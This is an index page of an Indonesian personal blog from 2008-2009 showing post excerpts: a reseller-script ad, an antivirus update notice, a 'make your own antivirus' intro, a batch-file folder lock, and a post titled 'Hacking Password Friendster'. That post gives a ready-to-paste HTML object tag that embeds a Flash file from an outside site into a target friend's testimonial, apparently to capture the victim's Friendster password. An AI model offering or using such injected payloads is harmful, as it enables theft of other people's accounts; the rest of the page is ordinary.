Posted by: Fikrul Setiawan | 14 March 2009

Script Bisnis yang Menghasilkan Uang

Script-Bisnis.Co.cc

Script-Bisnis.Co.cc menyediakan berbagai script-script yang dapat menghasilkan uang diantaranya PHP Random Reseller adalah website replikasi siap pakai untuk menjalankan bisnis reseller. Script ini seperti yang dipakai situs script-bisnis.co.cc dan sangat mudah untuk digunakan dan dikonfigurasi. Anda hanya tinggal mengisi Nama anda, no. rekening, harga produk, persenan untuk reseller, isi email Autoresponder dan lain-lain melalui Admin area, selanjutnya website bisnis reseller anda sudah siap digunakan untuk menjual produk anda dengan system random reseller. Read More…

Posted by: Fikrul Setiawan | 8 November 2008

Rieysha-Prisa: PCMAV 1.8 Update Build3

13 virus baru yang banyak dilaporkan menyebar di Indonesia di minggu ini telah ditambahkan pada Update Build3. Bagi Anda pengguna PCMAV 1.8 sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi. Jadi total virus yang dikenali oleh update Build3 kali ini adalah sebanyak 35 virus.

Untuk mendapatkan dan menggunakan update PCMAV ini, pastikan terlebih dahulu PCMAV RealTime Protector tidak sedang aktif. Jika iya, Anda harus menutup aplikasi tersebut terlebih dahulu. Lalu Anda cukup menjalankan PCMAV Cleaner (PCMAV-CLN.exe), tentunya komputer harus dalam keadaan aktif terhubung ke Internet (non-proxy). Fitur GetUpdates dari PCMAV secara otomatis akan memberikan alamat internet yang aktif di mana Anda bisa men-download file update tersebut. Letakkan file hasil download tersebut (PCMAV.vdb) ke dalam folder di mana PCMAV berada. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update. Read More…

Posted by: Fikrul Setiawan | 29 July 2008

Website Baru

Akhirnya FIKRUL SETIAWAN kembali membuat website pribadinya, silahkan anda membukanya di www.fikrul.co.cc atau klik gambar ini

Posted by: Fikrul Setiawan | 29 February 2008

Membuat Anti Virus Sendiri

Notes :
– Penulis TIDAK bertanggung jawab atas penggunaan maupun penyalahgunaan dari artikel ini.
– Tujuan dibuat artikel HANYA untuk BAHAN PEMBELAJARAN saja.
– Penggunaan nama, merek, atau logo hanya sebagai CONTOH dan REFERENSI saja, TIDAK ada maksud mempromosikan pihak tertentu.
– Penulis mohon maaf apabila seluruh/sebagian dari isi artikel ini sudah tersirat dalam artikel sejenis lainnya.

Main#
Sekarang kehadiran para virus maker (–selanjutnya disingkat jadi VM saja) lokal telah membuat gerah para user komputer tanah air. Bisa dibayangkan bila dari sekian banyak virus lokal tidak satu-dua yang menghancurkan data (terutama bagi file office; word, excel, dll…). Bagi para vendor Anti Virus (–selanjutnya disingkat menjadi AV saja) fenomena ini adalah lahan bisnis untuk produk mereka. Sebut saja NORMAN, yang kini men-support perusahaan konsultan virus lokal (–VAKSIN.COM) , Symantec, McAffe, NOD32, dan sebagainya. Dengan menawarkan update definisi software AV tercepat, engine scanner paling sensitif, dan lain-lain merupakan kiat untuk memancing para korban virus membeli dan menggunakan software AV mereka. Bagi penulis sendiri hal ini memang agak memberatkan mengingat update file definisi atau engine AV tsb haruslah melalui koneksi internet. Lalu bagaimana yang tidak mempunyai akses sama sekali? Konsekuensinya iyalah tertinggal dalam hal pengenalan varian virus baru yang pada ujung-ujungnya membuat AV yang sudah terinstall bagai ‘Macan Ompong’. Kalau kita membuat AV sendiri bagaimana? dengan database definisi yang bisa diupdate oleh kita bahkan dapat saling tukar dengan teman? Bisa saja, dengan syarat mau mempelajari sedikit teknik pemograman. Read More…

Posted by: Fikrul Setiawan | 17 February 2008

Basmi Virus Via Notepad

Pernahkah anda merasa diri anda seperti anti virus??? yeah itulah yang pernah gw rasa’in knapa???
bagaimana tidak, entah itu kawan rumah, kampuzzz bahkan kawan nongkrong pun kalo ada permasalahan dengan virus nanya_Nye ke Gw padahal dia tawu dengan pasti kalo OS Win*** gw ga’ pake AntiVirus, spontan gw jawab dengan nada bercanda “Emang_Nye Gw AntiVirus hehe”…
Walaupun begitu gw cukup bangga ama diri gw sendiri hehehehe!!!! Read More…

Posted by: Fikrul Setiawan | 14 February 2008

Hacking Password Friendster

Info Lebih lanjut download tutorialnya KLIK SINI

  1. Melakukan Hacking password di friendster
    Karena banyak request hack fs tutor yg baru, langkah-langkahnya :
    Masuk ke testimonial teman anda / target anda.
  2. Masukkan :
    Quote:
    <object classid=’clsid:D27CDB6E-AE6D-11cf-96B8-444553540000′ codebase=’http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0′ width=’18′ height=’18′>
    <param name=’movie’ value=’http://www.yogyafree.net/fs.swf’>
    <param name=’quality’ value=’high’>
    <embed src=’http://www.yogyafree.net/fs.swf’ quality=’high’ pluginspage=’http://www.macromedia.com/go/getflashplayer’ type=’application/x-shockwave-flash’ width=’18′ height=’18′></embed>
    </object> Read More…
Posted by: Fikrul Setiawan | 6 February 2008

Mengunci Folder Tanpa Software

Aplikasi atau software Folder Lock atau Pengunci Folder banyak tersedia di internet, baik yg bayar ataupun yang gratis. Kali ini kita akan mengunci folder dengan membuat Folder Lock tanpa menggunakan software.
Buka Aplikasi NotePad yang ada diwindows, Ketik atau Copy Paste Text atau Script berikut kedalam NotePAd:

@ECHO OFF
if EXIST “MyFilesLocked” goto UNLOCK
if NOT EXIST MyFiles goto MDMYFILES
echo Mau Kunci Folder MyFiles ??(Y/N)
set /p “pilihan=>”
if %pilihan%==y goto LOCK
if not %pilihan%==y goto END
:LOCK
ren “MyFiles” MyFilesLocked
attrib +h +s “MyFilesLocked”
cacls “MyFilesLocked” /p everyone:n /e
cls
echo Folder MyFiles sudah terkunci… Read More…

Older Posts »

Categories